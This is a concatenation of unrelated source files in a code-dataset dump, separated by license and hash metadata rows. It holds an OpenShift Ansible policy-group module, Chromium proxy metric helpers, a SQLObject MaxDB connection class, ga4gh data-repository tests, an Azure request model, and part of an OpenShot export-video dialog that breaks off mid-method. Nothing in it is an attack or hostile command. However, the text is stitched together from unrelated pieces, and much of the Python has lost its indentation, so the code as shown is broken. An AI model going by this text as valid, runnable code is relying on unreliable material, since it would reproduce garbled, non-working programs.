def add_user(self, inc_user):
''' add a user '''
if self.users:
self.users.append(inc_user)
else:
self.put(SecurityContextConstraints.users_path, [inc_user])
return True
def add_group(self, inc_group):
''' add a group '''
if self.groups:
self.groups.append(inc_group)
else:
self.put(SecurityContextConstraints.groups_path, [inc_group])
return True
def remove_user(self, inc_user):
''' remove a user '''
try:
self.users.remove(inc_user)
except ValueError as _:
return False
return True
def remove_group(self, inc_group):
''' remove a group '''
try:
self.groups.remove(inc_group)
except ValueError as _:
return False
return True
def update_user(self, inc_user):
''' update a user '''
try:
index = self.users.index(inc_user)
except ValueError as _:
return self.add_user(inc_user)
self.users[index] = inc_user
return True
def update_group(self, inc_group):
''' update a group '''
try:
index = self.groups.index(inc_group)
except ValueError as _:
return self.add_group(inc_group)
self.groups[index] = inc_group
return True
def find_user(self, inc_user):
''' find a user '''
index = None
try:
index = self.users.index(inc_user)
except ValueError as _:
return index
return index
def find_group(self, inc_group):
''' find a group '''
index = None
try:
index = self.groups.index(inc_group)
except ValueError as _:
return index
return index
# -*- -*- -*- End included fragment: lib/scc.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: class/oc_adm_policy_group.py -*- -*- -*-
class PolicyGroupException(Exception):
''' PolicyGroup exception'''
pass
class PolicyGroupConfig(OpenShiftCLIConfig):
''' PolicyGroupConfig is a DTO for group related policy. '''
def __init__(self, namespace, kubeconfig, policy_options):
super(PolicyGroupConfig, self).__init__(policy_options['name']['value'],
namespace, kubeconfig, policy_options)
self.kind = self.get_kind()
self.namespace = namespace
def get_kind(self):
''' return the kind we are working with '''
if self.config_options['resource_kind']['value'] == 'role':
return 'rolebinding'
elif self.config_options['resource_kind']['value'] == 'cluster-role':
return 'clusterrolebinding'
elif self.config_options['resource_kind']['value'] == 'scc':
return 'scc'
return None
# pylint: disable=too-many-return-statements
class PolicyGroup(OpenShiftCLI):
    ''' Class to handle attaching policies to groups '''
def __init__(self,
config,
verbose=False):
''' Constructor for PolicyGroup '''
super(PolicyGroup, self).__init__(config.namespace, config.kubeconfig, verbose)
self.config = config
self.verbose = verbose
self._rolebinding = None
self._scc = None
@property
def role_binding(self):
''' role_binding getter '''
return self._rolebinding
@role_binding.setter
def role_binding(self, binding):
''' role_binding setter '''
self._rolebinding = binding
@property
def security_context_constraint(self):
''' security_context_constraint getter '''
return self._scc
@security_context_constraint.setter
def security_context_constraint(self, scc):
''' security_context_constraint setter '''
self._scc = scc
def get(self):
'''fetch the desired kind'''
resource_name = self.config.config_options['name']['value']
if resource_name == 'cluster-reader':
resource_name += 's'
# oc adm policy add-... creates policy bindings with the name
# "[resource_name]-binding", however some bindings in the system
# simply use "[resource_name]". So try both.
results = self._get(self.config.kind, resource_name)
if results['returncode'] == 0:
return results
# Now try -binding naming convention
return self._get(self.config.kind, resource_name + "-binding")
def exists_role_binding(self):
''' return whether role_binding exists '''
results = self.get()
if results['returncode'] == 0:
self.role_binding = RoleBinding(results['results'][0])
            if self.role_binding.find_group_name(self.config.config_options['group']['value']) is not None:
return True
return False
elif self.config.config_options['name']['value'] in results['stderr'] and '" not found' in results['stderr']:
return False
return results
def exists_scc(self):
''' return whether scc exists '''
results = self.get()
if results['returncode'] == 0:
self.security_context_constraint = SecurityContextConstraints(results['results'][0])
            if self.security_context_constraint.find_group(self.config.config_options['group']['value']) is not None:
return True
return False
return results
def exists(self):
'''does the object exist?'''
if self.config.config_options['resource_kind']['value'] == 'cluster-role':
return self.exists_role_binding()
elif self.config.config_options['resource_kind']['value'] == 'role':
return self.exists_role_binding()
elif self.config.config_options['resource_kind']['value'] == 'scc':
return self.exists_scc()
return False
def perform(self):
'''perform action on resource'''
cmd = ['policy',
self.config.config_options['action']['value'],
self.config.config_options['name']['value'],
self.config.config_options['group']['value']]
return self.openshift_cmd(cmd, oadm=True)
@staticmethod
def run_ansible(params, check_mode):
'''run the idempotent ansible code'''
state = params['state']
action = None
if state == 'present':
action = 'add-' + params['resource_kind'] + '-to-group'
else:
action = 'remove-' + params['resource_kind'] + '-from-group'
nconfig = PolicyGroupConfig(params['namespace'],
params['kubeconfig'],
{'action': {'value': action, 'include': False},
'group': {'value': params['group'], 'include': False},
'resource_kind': {'value': params['resource_kind'], 'include': False},
'name': {'value': params['resource_name'], 'include': False},
})
policygroup = PolicyGroup(nconfig, params['debug'])
# Run the oc adm policy group related command
########
# Delete
########
if state == 'absent':
if not policygroup.exists():
return {'changed': False, 'state': 'absent'}
if check_mode:
return {'changed': False, 'msg': 'CHECK_MODE: would have performed a delete.'}
api_rval = policygroup.perform()
if api_rval['returncode'] != 0:
return {'msg': api_rval}
            return {'changed': True, 'results': api_rval, 'state': 'absent'}
if state == 'present':
########
# Create
########
results = policygroup.exists()
if isinstance(results, dict) and 'returncode' in results and results['returncode'] != 0:
return {'msg': results}
if not results:
if check_mode:
return {'changed': False, 'msg': 'CHECK_MODE: would have performed a create.'}
api_rval = policygroup.perform()
if api_rval['returncode'] != 0:
return {'msg': api_rval}
                return {'changed': True, 'results': api_rval, 'state': 'present'}
            return {'changed': False, 'state': 'present'}
        return {'failed': True, 'changed': False, 'results': 'Unknown state passed. %s' % state, 'state': 'unknown'}
# -*- -*- -*- End included fragment: class/oc_adm_policy_group.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: ansible/oc_adm_policy_group.py -*- -*- -*-
def main():
'''
ansible oc adm module for group policy
'''
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present', type='str',
choices=['present', 'absent']),
debug=dict(default=False, type='bool'),
resource_name=dict(required=True, type='str'),
namespace=dict(default='default', type='str'),
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
group=dict(required=True, type='str'),
resource_kind=dict(required=True, choices=['role', 'cluster-role', 'scc'], type='str'),
),
supports_check_mode=True,
)
results = PolicyGroup.run_ansible(module.params, module.check_mode)
if 'failed' in results:
module.fail_json(**results)
module.exit_json(**results)
if __name__ == "__main__":
main()
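# Example task using this module (the values are illustrative):
#
#   - name: give the developers group edit rights in a project
#     oc_adm_policy_group:
#       namespace: myproject
#       group: developers
#       resource_kind: role
#       resource_name: edit
#       state: present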
# -*- -*- -*- End included fragment: ansible/oc_adm_policy_group.py -*- -*- -*-
| apache-2.0 | 6,297,112,232,320,834,000 | 31.602089 | 118 | 0.536076 | false |
CapOM/ChromiumGStreamerBackend | tools/chrome_proxy/common/chrome_proxy_metrics.py | 15 | 3854 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import time
from common import network_metrics
from telemetry.page import page_test
from telemetry.value import scalar
CHROME_PROXY_VIA_HEADER = 'Chrome-Compression-Proxy'
class ChromeProxyMetricException(page_test.MeasurementFailure):
pass
class ChromeProxyResponse(network_metrics.HTTPResponse):
""" Represents an HTTP response from a timeline event."""
def __init__(self, event):
super(ChromeProxyResponse, self).__init__(event)
def ShouldHaveChromeProxyViaHeader(self):
resp = self.response
# Ignore https and data url
if resp.url.startswith('https') or resp.url.startswith('data:'):
return False
# Ignore 304 Not Modified and cache hit.
if resp.status == 304 or resp.served_from_cache:
return False
# Ignore invalid responses that don't have any header. Log a warning.
if not resp.headers:
      logging.warning('response for %s does not have any headers '
                      '(referer=%s, status=%s)',
                      resp.url, resp.GetHeader('Referer'), resp.status)
return False
return True
def HasResponseHeader(self, key, value):
response_header = self.response.GetHeader(key)
if not response_header:
return False
values = [v.strip() for v in response_header.split(',')]
return any(v == value for v in values)
def HasRequestHeader(self, key, value):
if key not in self.response.request_headers:
return False
request_header = self.response.request_headers[key]
values = [v.strip() for v in request_header.split(',')]
return any(v == value for v in values)
def HasChromeProxyViaHeader(self):
via_header = self.response.GetHeader('Via')
if not via_header:
return False
vias = [v.strip(' ') for v in via_header.split(',')]
# The Via header is valid if it has a 4-character version prefix followed by
# the proxy name, for example, "1.1 Chrome-Compression-Proxy".
return any(v[4:] == CHROME_PROXY_VIA_HEADER for v in vias)
def HasExtraViaHeader(self, extra_header):
return self.HasResponseHeader('Via', extra_header)
def IsValidByViaHeader(self):
return (not self.ShouldHaveChromeProxyViaHeader() or
self.HasChromeProxyViaHeader())
def GetChromeProxyRequestHeaderValue(self, key):
"""Get a specific Chrome-Proxy request header value.
Returns:
      The value associated with the given key in the Chrome-Proxy request
      header, or None if no such key is present.
"""
if 'Chrome-Proxy' not in self.response.request_headers:
return None
chrome_proxy_request_header = self.response.request_headers['Chrome-Proxy']
values = [v.strip() for v in chrome_proxy_request_header.split(',')]
for value in values:
kvp = value.split('=', 1)
if len(kvp) == 2 and kvp[0].strip() == key:
return kvp[1].strip()
return None
def GetChromeProxyClientType(self):
"""Get the client type directive from the Chrome-Proxy request header.
Returns:
The client type directive from the Chrome-Proxy request header for the
request that lead to this response. For example, if the request header
"Chrome-Proxy: c=android" is present, then this method would return
"android". Returns None if no client type directive is present.
"""
return self.GetChromeProxyRequestHeaderValue('c')
def HasChromeProxyLoFiRequest(self):
return self.HasRequestHeader('Chrome-Proxy', "q=low")
def HasChromeProxyLoFiResponse(self):
return self.HasResponseHeader('Chrome-Proxy', "q=low")
def HasChromeProxyPassThroughRequest(self):
return self.HasRequestHeader('Chrome-Proxy', "pass-through")
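# Illustration of the Via check above (header values are examples):
# "Via: 1.1 Chrome-Compression-Proxy" counts as proxied because the
# 4-character version prefix ("1.1 ") is skipped before comparing
# against CHROME_PROXY_VIA_HEADER, while "Via: 1.1 some-other-proxy"
# does not.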
| bsd-3-clause | 1,142,881,576,152,614,400 | 35.018692 | 80 | 0.69616 | false |
clausqr/HTPC-Manager | libs/sqlobject/maxdb/maxdbconnection.py | 8 | 10919 | """
Contributed by Edigram SAS, Paris France Tel:01 44 77 94 00
Ahmed MOHAMED ALI <[email protected]> 27 April 2004
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
connection creation sample::
__connection__ = DBConnection.maxdbConnection(
host=hostname, database=dbname,
user=user_name, password=user_password, autoCommit=1, debug=1)
"""
import os  # needed by _connectionFromParams for os.path.sep
from sqlobject.dbconnection import DBAPI
from sqlobject import col
class maxdbException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class LowerBoundOfSliceIsNotSupported(maxdbException):
def __init__(self, value):
maxdbException.__init__(self, '')
class IncorrectIDStyleError(maxdbException):
def __init__(self,value):
maxdbException.__init__(
self,
'This primary key name is not in the expected style, '
'please rename the column to %r or switch to another style'
% value)
class StyleMismatchError(maxdbException):
def __init__(self, value):
maxdbException.__init__(
self,
'The name %r is only permitted for primary key, change the '
'column name or switch to another style' % value)
class PrimaryKeyNotFound(maxdbException):
def __init__(self, value):
maxdbException.__init__(
self,
"No primary key was defined on table %r" % value)
SAPDBMAX_ID_LENGTH=32
class MaxdbConnection(DBAPI):
supportTransactions = True
dbName = 'maxdb'
schemes = [dbName]
def __init__ (self, host='', port=None, user=None, password=None,
database=None, autoCommit=1, sqlmode='internal',
isolation=None, timeout=None, **kw):
from sapdb import dbapi
self.module = dbapi
self.host = host
self.port = port
self.user = user
self.password = password
self.db = database
self.autoCommit = autoCommit
self.sqlmode = sqlmode
self.isolation = isolation
self.timeout = timeout
DBAPI.__init__(self, **kw)
@classmethod
def _connectionFromParams(cls, auth, password, host, port, path, args):
path = path.replace('/', os.path.sep)
return cls(host, port, user=auth, password=password,
database=path, **args)
def _getConfigParams(self,sqlmode,auto):
autocommit='off'
if auto:
autocommit='on'
opt = {}
opt["autocommit"] = autocommit
opt["sqlmode"] = sqlmode
if self.isolation:
opt["isolation"]=self.isolation
if self.timeout :
opt["timeout"]=self.timeout
return opt
def _setAutoCommit(self, conn, auto):
conn.close()
conn.__init__(self.user, self.password, self.db, self.host,
**self._getConfigParams(self.sqlmode, auto))
def createSequenceName(self,table):
"""
        Sequence names are built by appending '_SEQ' to the table name.
        The table name is truncated first because SAP DB identifiers
        cannot exceed 32 characters, which keeps the resulting sequence
        name within the 32-character limit as well.
"""
return '%s_SEQ'%(table[:SAPDBMAX_ID_LENGTH -4])
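        # e.g. a hypothetical 40-character table name is cut to its first
        # 28 characters so that '<first_28_chars>_SEQ' is exactly 32 chars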
def makeConnection(self):
conn = self.module.Connection(
self.user, self.password, self.db, self.host,
**self._getConfigParams(self.sqlmode, self.autoCommit))
return conn
def _queryInsertID(self, conn, soInstance, id, names, values):
table = soInstance.sqlmeta.table
idName = soInstance.sqlmeta.idName
c = conn.cursor()
if id is None:
c.execute('SELECT %s.NEXTVAL FROM DUAL' % (self.createSequenceName(table)))
id = c.fetchone()[0]
names = [idName] + names
values = [id] + values
q = self._insertSQL(table, names, values)
if self.debug:
self.printDebug(conn, q, 'QueryIns')
c.execute(q)
if self.debugOutput:
self.printDebug(conn, id, 'QueryIns', 'result')
return id
@classmethod
def sqlAddLimit(cls,query,limit):
sql = query
sql = sql.replace("SELECT","SELECT ROWNO, ")
if sql.find('WHERE') != -1:
sql = sql + ' AND ' + limit
else:
sql = sql + 'WHERE ' + limit
return sql
@classmethod
def _queryAddLimitOffset(cls, query, start, end):
if start:
raise LowerBoundOfSliceIsNotSupported
limit = ' ROWNO <= %d ' % (end)
return cls.sqlAddLimit(query,limit)
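    # Example (the query text is invented): with end=10,
    #   SELECT name FROM person WHERE age > 21
    # becomes, modulo whitespace,
    #   SELECT ROWNO, name FROM person WHERE age > 21 AND ROWNO <= 10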
def createTable(self, soClass):
        # We create the table and the sequence together because the two
        # additions must be atomic. Ideally this would run inside a
        # transaction, but the transaction class currently hits a
        # recursion limit error, so the queries are issued directly.
#t=self.transaction()
# t.query('CREATE TABLE %s (\n%s\n)' % \
# (soClass.sqlmeta.table, self.createColumns(soClass)))
#
# t.query("CREATE SEQUENCE %s" % self.createSequenceName(soClass.sqlmeta.table))
# t.commit()
        # TODO: switch back to a transaction once the recursion problem is solved
self.query('CREATE TABLE %s (\n%s\n)' % \
(soClass.sqlmeta.table, self.createColumns(soClass)))
self.query("CREATE SEQUENCE %s"
% self.createSequenceName(soClass.sqlmeta.table))
return []
def createReferenceConstraint(self, soClass, col):
return col.maxdbCreateReferenceConstraint()
def createColumn(self, soClass, col):
return col.maxdbCreateSQL()
def createIDColumn(self, soClass):
key_type = {int: "INT", str: "TEXT"}[soClass.sqlmeta.idType]
return '%s %s PRIMARY KEY' % (soClass.sqlmeta.idName, key_type)
def createIndexSQL(self, soClass, index):
return index.maxdbCreateIndexSQL(soClass)
def dropTable(self, tableName,cascade=False):
        # We drop the table and the sequence together because the two
        # removals must be atomic. As in createTable, the transaction
        # class currently hits a recursion limit error, so the queries
        # are issued directly.
# try:
# t=self.transaction()
# t.query("DROP TABLE %s" % tableName)
# t.query("DROP SEQUENCE %s" % self.createSequenceName(tableName))
# t.commit()
# except:
# t.rollback()
        # TODO: switch back to a transaction once the recursion problem is solved
self.query("DROP TABLE %s" % tableName)
self.query("DROP SEQUENCE %s" % self.createSequenceName(tableName))
def joinSQLType(self, join):
return 'INT NOT NULL'
def tableExists(self, tableName):
for (table,) in self.queryAll("SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OBJECT_TYPE='TABLE'"):
if table.lower() == tableName.lower():
return True
return False
def addColumn(self, tableName, column):
self.query('ALTER TABLE %s ADD %s' %
(tableName,
column.maxdbCreateSQL()))
def delColumn(self, sqlmeta, column):
self.query('ALTER TABLE %s DROP COLUMN %s' % (sqlmeta.table, column.dbName))
GET_COLUMNS = """
SELECT COLUMN_NAME, NULLABLE, DATA_DEFAULT, DATA_TYPE,
DATA_LENGTH, DATA_SCALE
FROM USER_TAB_COLUMNS WHERE TABLE_NAME=UPPER('%s')"""
GET_PK_AND_FK = """
SELECT constraint_cols.column_name, constraints.constraint_type,
refname,reftablename
FROM user_cons_columns constraint_cols
INNER JOIN user_constraints constraints
ON constraint_cols.constraint_name = constraints.constraint_name
LEFT OUTER JOIN show_foreign_key fk
ON constraint_cols.column_name = fk.columnname
WHERE constraints.table_name =UPPER('%s')"""
def columnsFromSchema(self, tableName, soClass):
colData = self.queryAll(self.GET_COLUMNS
% tableName)
results = []
keymap = {}
pkmap={}
fkData = self.queryAll(self.GET_PK_AND_FK% tableName)
for col, cons_type, refcol, reftable in fkData:
col_name= col.lower()
pkmap[col_name]=False
if cons_type == 'R':
keymap[col_name]=reftable.lower()
elif cons_type == 'P':
pkmap[col_name]=True
if len(pkmap) == 0:
            raise PrimaryKeyNotFound(tableName)
for (field, nullAllowed, default, data_type, data_len,
data_scale) in colData:
# id is defined as primary key --> ok
# We let sqlobject raise error if the 'id' is used for another column
field_name = field.lower()
if (field_name == soClass.sqlmeta.idName) and pkmap[field_name]:
continue
colClass, kw = self.guessClass(data_type,data_len,data_scale)
kw['name'] = field_name
kw['dbName'] = field
            # the schema reports nullable='Y'/'N'; notNone is the inverse
            if nullAllowed == 'Y':
                nullAllowed = False
            else:
                nullAllowed = True
kw['notNone'] = nullAllowed
if default is not None:
kw['default'] = default
if field_name in keymap:
kw['foreignKey'] = keymap[field_name]
results.append(colClass(**kw))
return results
_numericTypes=['INTEGER', 'INT','SMALLINT']
_dateTypes=['DATE','TIME','TIMESTAMP']
def guessClass(self, t, flength, fscale=None):
"""
An internal method that tries to figure out what Col subclass
is appropriate given whatever introspective information is
available -- both very database-specific.
"""
if t in self._numericTypes:
return col.IntCol, {}
# The type returned by the sapdb library for LONG is
# SapDB_LongReader To get the data call the read member with
# desired size (default =-1 means get all)
elif t.find('LONG') != -1:
return col.StringCol, {'length': flength,
'varchar': False}
elif t in self._dateTypes:
return col.DateTimeCol, {}
elif t == 'FIXED':
            return col.CurrencyCol, {'size': flength,
                                     'precision': fscale}
else:
return col.Col, {}
| mit | 4,959,189,039,843,539,000 | 34.036304 | 103 | 0.576335 | false |
dcolligan/server | tests/unit/test_datarepo.py | 4 | 2918 | """
Tests the datarepo module
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import tempfile
import unittest
import ga4gh.server.datarepo as datarepo
import ga4gh.server.exceptions as exceptions
prefix = "ga4gh_datarepo_test"
def makeTempFile():
return tempfile.mkstemp(prefix=prefix)
def makeTempDir():
return tempfile.mkdtemp(prefix=prefix)
class AbstractDataRepoTest(unittest.TestCase):
"""
Parent class for data repo tests
"""
def setUp(self):
_, self._repoPath = makeTempFile()
def tearDown(self):
os.unlink(self._repoPath)
class TestDataRepoVersion(AbstractDataRepoTest):
"""
Tests the repo schema version is written and read correctly
and throws an error when there is a version mismatch.
"""
def testRightVersion(self):
repo = datarepo.SqlDataRepository(self._repoPath)
repo.open(datarepo.MODE_WRITE)
repo.initialise()
anotherRepo = datarepo.SqlDataRepository(self._repoPath)
anotherRepo.open(datarepo.MODE_READ)
        self.assertEqual(anotherRepo._schemaVersion, str(repo.version))
def testWrongVersion(self):
repo = datarepo.SqlDataRepository(self._repoPath)
repo.version = datarepo.SqlDataRepository.SchemaVersion(
"wrong.version")
repo.open(datarepo.MODE_WRITE)
repo.initialise()
anotherRepo = datarepo.SqlDataRepository(self._repoPath)
with self.assertRaises(
exceptions.RepoSchemaVersionMismatchException):
anotherRepo.open(datarepo.MODE_READ)
class TestBadDatabase(AbstractDataRepoTest):
"""
Tests that errors are thrown when an invalid database is used
"""
def testDbFileWithoutTables(self):
repo = datarepo.SqlDataRepository(self._repoPath)
with self.assertRaises(exceptions.RepoInvalidDatabaseException):
repo.open(datarepo.MODE_READ)
def testTextFile(self):
with open(self._repoPath, 'w') as textFile:
textFile.write('This is now a text file')
repo = datarepo.SqlDataRepository(self._repoPath)
with self.assertRaises(exceptions.RepoInvalidDatabaseException):
repo.open(datarepo.MODE_READ)
class TestBadDatabaseNoSetup(unittest.TestCase):
"""
Tests that errors are thrown when an invalid database is used
(does not use setup/teardown functions)
"""
def testDirectory(self):
repoPath = makeTempDir()
repo = datarepo.SqlDataRepository(repoPath)
with self.assertRaises(exceptions.RepoInvalidDatabaseException):
repo.open(datarepo.MODE_READ)
def testNonexistentFile(self):
repo = datarepo.SqlDataRepository("aFilePathThatDoesNotExist")
with self.assertRaises(exceptions.RepoNotFoundException):
repo.open(datarepo.MODE_READ)
| apache-2.0 | -7,094,235,138,709,637,000 | 30.042553 | 72 | 0.699109 | false |
SUSE/azure-sdk-for-python | unreleased/azure-mgmt-machinelearning/azure/mgmt/machinelearning/models/example_request.py | 5 | 1192 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ExampleRequest(Model):
"""Sample input data for the service's input(s).
:param inputs: Sample input data for the web service's input(s) given as
an input name to sample input values matrix map.
:type inputs: dict
:param global_parameters: Sample input data for the web service's global
parameters
:type global_parameters: dict
"""
_attribute_map = {
'inputs': {'key': 'inputs', 'type': '{list}'},
'global_parameters': {'key': 'globalParameters', 'type': '{object}'},
}
def __init__(self, inputs=None, global_parameters=None):
self.inputs = inputs
self.global_parameters = global_parameters
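# Minimal usage sketch (the field values are illustrative only):
#   request = ExampleRequest(
#       inputs={'input1': [[1.0, 2.0], [3.0, 4.0]]},
#       global_parameters={'threshold': 0.5})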
| mit | -6,103,612,022,085,685,000 | 35.121212 | 77 | 0.598993 | false |
samdowd/drumm-farm | drumm_env/bin/explode.py | 1 | 2465 | #!/home/sam/p/drumm-farm/drumm_env/bin/python
#
# The Python Imaging Library
# $Id$
#
# split an animation into a number of frame files
#
from __future__ import print_function
from PIL import Image
import os
import sys
class Interval(object):
def __init__(self, interval="0"):
self.setinterval(interval)
def setinterval(self, interval):
self.hilo = []
for s in interval.split(","):
if not s.strip():
continue
try:
v = int(s)
if v < 0:
lo, hi = 0, -v
else:
lo = hi = v
except ValueError:
i = s.find("-")
lo, hi = int(s[:i]), int(s[i+1:])
self.hilo.append((hi, lo))
if not self.hilo:
self.hilo = [(sys.maxsize, 0)]
def __getitem__(self, index):
for hi, lo in self.hilo:
if hi >= index >= lo:
return 1
return 0
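# Quick sanity examples of Interval parsing (semantics as implemented
# above): "1-10,15" matches frames 1..10 and 15, and a bare negative
# value such as "-15" is shorthand for the range 0..15.
assert Interval("1-10,15")[5] == 1
assert Interval("1-10,15")[15] == 1
assert Interval("1-10,15")[12] == 0
assert Interval("-15")[0] == 1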
# --------------------------------------------------------------------
# main program
html = 0
if sys.argv[1:2] == ["-h"]:
html = 1
del sys.argv[1]
if not sys.argv[2:]:
print()
print("Syntax: python explode.py infile template [range]")
print()
print("The template argument is used to construct the names of the")
print("individual frame files. The frames are numbered file001.ext,")
print("file002.ext, etc. You can insert %d to control the placement")
print("and syntax of the frame number.")
print()
print("The optional range argument specifies which frames to extract.")
print("You can give one or more ranges like 1-10, 5, -15 etc. If")
print("omitted, all frames are extracted.")
sys.exit(1)
infile = sys.argv[1]
outfile = sys.argv[2]
frames = Interval(",".join(sys.argv[3:]))
try:
# check if outfile contains a placeholder
outfile % 1
except TypeError:
file, ext = os.path.splitext(outfile)
outfile = file + "%03d" + ext
ix = 1
im = Image.open(infile)
if html:
file, ext = os.path.splitext(outfile)
html = open(file+".html", "w")
html.write("<html>\n<body>\n")
while True:
if frames[ix]:
im.save(outfile % ix)
print(outfile % ix)
if html:
html.write("<img src='%s'><br>\n" % outfile % ix)
try:
im.seek(ix)
except EOFError:
break
ix += 1
if html:
html.write("</body>\n</html>\n")
| mit | 8,341,897,567,367,451,000 | 21.008929 | 75 | 0.532657 | false |
zaenalarifin/openshot_jmd | openshot/windows/ExportVideo.py | 1 | 22341 | # OpenShot Video Editor is a program that creates, modifies, and edits video files.
# Copyright (C) 2009 Jonathan Thomas
#
# This file is part of OpenShot Video Editor (http://launchpad.net/openshot/).
#
# OpenShot Video Editor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenShot Video Editor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OpenShot Video Editor. If not, see <http://www.gnu.org/licenses/>.
has_py_notify = False
try:
import pynotify
has_py_notify = True
except:
has_py_notify = False
import os
import gtk, gtk.glade
import xml.dom.minidom as xml
import locale
from classes import messagebox, profiles, project, video
from windows.SimpleGladeApp import SimpleGladeApp
# init the foreign language
from language import Language_Init
class frmExportVideo(SimpleGladeApp):
def __init__(self, path="ExportVideo.glade", root="frmExportVideo", domain="OpenShot", form=None, project=None, **kwargs):
SimpleGladeApp.__init__(self, os.path.join(project.GLADE_DIR, path), root, domain, **kwargs)
# Add language support
_ = Language_Init.Translator(project).lang.gettext
self._ = _
self.form = form
self.project = project
self.frmExportVideo.show_all()
self.invalid_codecs = []
# init the project type properties
self.init_properties(self.cmbProjectType.get_active_text())
# set the export file name
self.txtFileName.set_text(self.project.name)
# set the export folder as the project folder (if any)
if ".openshot" in self.project.folder:
# This is the openshot default project (set the folder to 'DESKTOP')
self.fileExportFolder.set_current_folder(self.project.DESKTOP)
else:
# Set project folder
self.fileExportFolder.set_current_folder(self.project.folder)
# init the list of possible project types / profiles
self.profile_list = profiles.mlt_profiles(self.project).get_profile_list()
# loop through each profile, and add it to the dropdown
for file_name, p in self.profile_list:
# append profile to list
self.cmbProjectType.append_text(p.description())
export_options = [_("Video & Audio"), _("Image Sequence")]
# loop through export to options
for option in export_options:
# append profile to list
self.cboExportTo.append_text(option)
#populate the format/codec drop downs
#formats
format_model = self.cboVIdeoFormat.get_model()
format_model.clear()
for format in self.form.vformats:
self.cboVIdeoFormat.append_text(format)
#video codecs
vcodecs_model = self.cboVideoCodec.get_model()
vcodecs_model.clear()
for vcodec in self.form.vcodecs:
self.cboVideoCodec.append_text(vcodec)
#audio codecs
acodecs_model = self.cboAudioCodec.get_model()
acodecs_model.clear()
for acodec in self.form.acodecs:
self.cboAudioCodec.append_text(acodec)
# set the dropdown boxes
self.set_project_type_dropdown()
self.set_export_to_dropdown()
#load the simple project type dropdown
presets = []
for file in os.listdir(self.project.EXPORT_PRESETS_DIR):
xmldoc = xml.parse(os.path.join(self.project.EXPORT_PRESETS_DIR,file))
type = xmldoc.getElementsByTagName("type")
presets.append(_(type[0].childNodes[0].data))
#exclude duplicates
presets = list(set(presets))
for item in sorted(presets):
self.cboSimpleProjectType.append_text(item)
#indicate that exporting cancelled
self.cancelled = False
def set_project_type_dropdown(self):
# get reference to gettext
_ = self._
# get the model and iterator of the project type dropdown box
model = self.cmbProjectType.get_model()
iter = model.get_iter_first()
while True:
# get the value of each item in the dropdown
value = model.get_value(iter, 0)
# check for the matching project type
if self.project.project_type == value:
# set the item as active
self.cmbProjectType.set_active_iter(iter)
# get the next item in the list
iter = model.iter_next(iter)
# break loop when no more dropdown items are found
if iter is None:
break
def on_expander_activate(self, widget, *args):
#print "on_expander_activate"
#self.frmExportVideo.set_size_request(0,0)
pass
def set_selection_dropdown(self):
# get reference to gettext
_ = self._
# get the model and iterator of the project type dropdown box
model = self.cboSelection.get_model()
iter = model.get_iter_first()
# set the item as active
self.cboSelection.set_active_iter(iter)
def set_export_to_dropdown(self):
# get reference to gettext
_ = self._
# get the model and iterator of the project type dropdown box
model = self.cboExportTo.get_model()
iter = model.get_iter_first()
# set the item as active
self.cboExportTo.set_active_iter(iter)
def on_cboSimpleProjectType_changed(self, widget, *args):
#set the target dropdown based on the selected project type
#first clear the combo
self.cboSimpleTarget.get_model().clear()
# get reference to gettext
_ = self._
#parse the xml files and get targets that match the project type
selected_project = self.cboSimpleProjectType.get_active_text()
project_types = []
for file in os.listdir(self.project.EXPORT_PRESETS_DIR):
xmldoc = xml.parse(os.path.join(self.project.EXPORT_PRESETS_DIR,file))
type = xmldoc.getElementsByTagName("type")
if _(type[0].childNodes[0].data) == selected_project:
titles = xmldoc.getElementsByTagName("title")
for title in titles:
project_types.append(_(title.childNodes[0].data))
for item in sorted(project_types):
self.cboSimpleTarget.append_text(item)
if selected_project == _("All Formats"):
            # default to OGG (theora/vorbis) for this type
self.set_dropdown_values(_("OGG (theora/vorbis)"), self.cboSimpleTarget)
else:
            # choose the first target
self.cboSimpleTarget.set_active(0)
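    # For reference, each preset file in EXPORT_PRESETS_DIR is parsed for
    # the tags used above and in on_cboSimpleTarget_changed. A sketch of
    # the expected shape (root element name and values are illustrative):
    #
    #   <preset>
    #     <type>Web</type>
    #     <title>YouTube HD</title>
    #     <projectprofile>HDV 720 25p</projectprofile>
    #     <videoformat>mp4</videoformat>
    #     <videocodec>libx264</videocodec>
    #     <audiocodec>aac</audiocodec>
    #     <samplerate>44100</samplerate>
    #     <audiochannels>2</audiochannels>
    #     <videobitrate low="5000000" med="8000000" high="10000000"/>
    #     <audiobitrate low="96000" med="128000" high="192000"/>
    #   </preset>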
def on_cboSimpleTarget_changed(self, widget, *args):
#set the profiles dropdown based on the selected target
# get reference to gettext
_ = self._
self.cboSimpleVideoProfile.get_model().clear()
self.cboSimpleQuality.get_model().clear()
#don't do anything if the combo has been cleared
if self.cboSimpleTarget.get_active_text():
selected_target = self.cboSimpleTarget.get_active_text()
			profiles_list = []
			# initialise the bit rate values so the quality checks below
			# don't fail if no preset (or bitrate element) matches
			v_l = v_m = v_h = None
			a_l = a_m = a_h = None
#parse the xml to return suggested profiles
for file in os.listdir(self.project.EXPORT_PRESETS_DIR):
xmldoc = xml.parse(os.path.join(self.project.EXPORT_PRESETS_DIR,file))
title = xmldoc.getElementsByTagName("title")
if _(title[0].childNodes[0].data) == selected_target:
